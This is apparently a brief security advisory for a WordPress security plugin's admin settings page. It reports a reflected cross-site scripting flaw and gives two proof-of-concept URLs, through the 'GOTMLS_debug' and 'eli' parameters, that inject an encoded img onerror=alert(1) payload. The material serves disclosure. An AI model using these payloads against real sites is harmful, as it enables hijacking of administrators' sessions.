The plugin does not sanitise and escape some parameters before outputting them back in an admin dashboard, leading to Reflected Cross-Site Scripting
https://example.com/wp-admin/admin.php?page=GOTMLS-settings&GOTMLS_debug=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3B%3E
Also possible with the $_GET['eli'] parameter: http://example.com/wp-admin/admin.php?page=GOTMLS-settings&eli=%3C%2Fscript%3E%3Cimg+src+onerror%3Dalert%281%29%3B%3E